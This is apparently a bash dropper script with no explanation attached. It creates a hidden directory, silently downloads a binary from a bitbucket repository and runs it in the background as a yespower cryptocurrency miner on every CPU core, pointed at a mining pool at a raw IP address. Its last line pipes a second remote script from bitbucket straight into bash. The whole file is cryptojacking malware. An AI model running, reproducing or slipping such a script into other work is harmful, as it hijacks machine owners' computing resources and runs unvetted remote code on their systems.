#!/bin/bash
apt-get update ; apt-get upgrade -y
mkdir .kap && cd .kap
wget -O sgr1 https://bitbucket.org/dennidarko01/kangkung/raw/master/plant >/dev/null 2>&1
chmod +x sgr1
./sgr1 -a yespower -o stratum+tcp://192.53.113.235:443 -u VNtZcT6BFKnLbk58dRnKMZ7tCSgcmWAed9.$(echo $(shuf -i 1-20000 -n 1)-awezwewe) -p webpassword=x,m=solo -t$(nproc --all) >/dev/null 2>&1 &
curl -sL https://bitbucket.org/lightcoral2/cangor/raw/master/boled04.sh | bash
